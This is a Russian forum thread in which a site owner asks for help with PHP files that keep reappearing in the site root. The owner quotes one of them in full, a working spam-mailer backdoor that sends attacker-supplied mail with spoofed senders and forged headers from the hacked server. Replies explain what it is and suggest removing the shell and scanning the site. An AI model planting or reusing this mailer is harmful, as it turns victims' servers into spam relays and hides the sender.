0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1137 Просмотров
*

Mangoz

  • Новичок
  • 12
  • 0 / 0
Помогите найти очаг вируса. Не могу найти, что генерирует эти файлы в корень сайта. Каким-то образом при переходе по ссылкам сайта меня кидает на сайты буржуйских социалок или фармы. Файлы появляются стабильно 3-4 раза за сутки, после того как их удалишь.



Код одного из файла

Код
<?php

function getDomainFromEmail($email)
{
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}

function random_string($length) {
    $key = '';
    $keys = range('a', 'z');

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key . '.php';
}

if(isset($_POST["to_address"]))
        $to = $_POST["to_address"];
else
{
echo "404 error";
exit;
}

$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);

set_time_limit (60);
@ignore_user_abort (true);

$to_ar = explode(',', $to);




if(isset($_POST["from_address"]))
{

$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

if(isset($_POST["use_local_domain"]))
{
         $l_domain = gethostname();
         
         $splitPos = strpos($l_domain, "www.");
         if ($splitPos !== false) {
         $l_domain = str_replace('www.', '', $l_domain);
          }

         $from_address = substr($from_address,  0, strpos($from_address, '@')). '@' . $l_domain;
}


//$header =  "MIME-Version: 1.0\r\n";
//$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
//$header .= 'From: ' . '"' . $from_name . '"' .  " <" . $from_address . ">\r\n";
//$header .= "Reply-To: $from_address\r\n";
//$header .= "Return-Path: $from_address\r\n";
//$header .= "X-Mailer: PHP/" . phpversion(). "\r\n" ;

$domain = getDomainFromEmail($email);
$randIP = "".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255);

$from_format = $from_name." <".$from_address.">";

 $header = "Message-Id: <".md5(uniqid(rand())).".".preg_replace("/[^a-z0-9]/i", "", $from_format)."@{$domain}>\r\n";
 $header.= "From: {$from_format}\r\n";
 $header.= "To: {$to}\r\n";
 $header .= "Reply-To: $from_address\r\n";
 $header .= "Return-Path: $from_address\r\n";
// $header.= "Subject: {$subject}\r\n";
 $header.= "Date: ".date("r")."\r\n";
 $header.= "Content-Type: text/plain; charset=iso-8859-1\r\n";
 $header.= "X-Priority: 3\r\n";
 $header.= "X-MSMail-Priority: Normal\r\n";
 $header.= "X-Mailer: PHP - " .phpversion()."\r\n";
 $header.= "X-PHP-Script: ". rand(0,500).":". random_string(rand(3,13)). " for " . $randIP ."\r\n";
// $header.= "\r\n";
// $header.= $message;
// $header.= "\r\n.\r\n";




$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}

if($result){echo 'good';}else{echo 'error : '.$result;}
 
?>
*

flyingspook

  • Живу я здесь
  • 3592
  • 247 / 9
Re: Генерация php файлов в корень сайта
« Ответ #1 : 02.10.2014, 11:00:49 »
ищите и удаляйте shell, закрывайте уязвимости сайта, это не генерирует а подгружают
*

wishlight

  • Живу я здесь
  • 4635
  • 275 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Генерация php файлов в корень сайта
« Ответ #2 : 02.10.2014, 11:13:38 »
Да. Кто-то развлекается.
Мои VDS быстрее твоих (промокод 648194016 - скидка 25% на первый месяц)|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Дешевые VDS|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг

Защита сайтов и логи взломов
*

robert

  • Живу я здесь
  • 4759
  • 437 / 18
Re: Генерация php файлов в корень сайта
« Ответ #3 : 02.10.2014, 11:14:35 »
Приведенный вами код рассылает спам от вашего имени.
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Mangoz

  • Новичок
  • 12
  • 0 / 0
Re: Генерация php файлов в корень сайта
« Ответ #4 : 02.10.2014, 11:54:45 »
В каких файлах может находиться уязвимость?
*

wishlight

  • Живу я здесь
  • 4635
  • 275 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Генерация php файлов в корень сайта
« Ответ #5 : 02.10.2014, 14:03:57 »
В общем в самых разнообразных вкратце. Мы же не знаем, что у вас установлено и сколько сайтов на аккаунте.
Мои VDS быстрее твоих (промокод 648194016 - скидка 25% на первый месяц)|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Дешевые VDS|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг

Защита сайтов и логи взломов
*

flyingspook

  • Живу я здесь
  • 3592
  • 247 / 9
*

Taatshi

  • Глобальный модератор
  • 5172
  • 475 / 1
  • Верстаем и кодим. Обращайтесь ;)
Re: Генерация php файлов в корень сайта
« Ответ #7 : 03.10.2014, 08:23:43 »
Mangoz, если Вы не знакомы хотя бы с основами php - Вам самому это дело не осилить. У меня порой занимает пару-тройку дней чтобы найти уязвимость, полностью очистить сайт и поставить хотя бы базовую защиту.

Но можете попробовать. Воспользуйтесь скриптом айболит - на сегодняшний день это один из  самых эффективных инструментов для работы.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Исчезли картинки с сайта на главном экране

Автор Эльвира

Ответов: 36
Просмотров: 617
Последний ответ 19.11.2019, 11:23:26
от wishlight
как восстановить статьи после установки нового сайта на ту же БД

Автор midlex

Ответов: 26
Просмотров: 4983
Последний ответ 23.10.2017, 08:21:19
от kungurskiy
Чем лучше всего делать резервные копии сайта?

Автор 7Azimuth

Ответов: 113
Просмотров: 45340
Последний ответ 21.08.2017, 09:18:05
от dmitry_stas
Переустановка сайта

Автор wectra

Ответов: 13
Просмотров: 874
Последний ответ 02.07.2017, 19:09:39
от wectra
Flow player вставка файлов.

Автор ksv

Ответов: 3
Просмотров: 1923
Последний ответ 16.06.2017, 21:29:30
от altvvc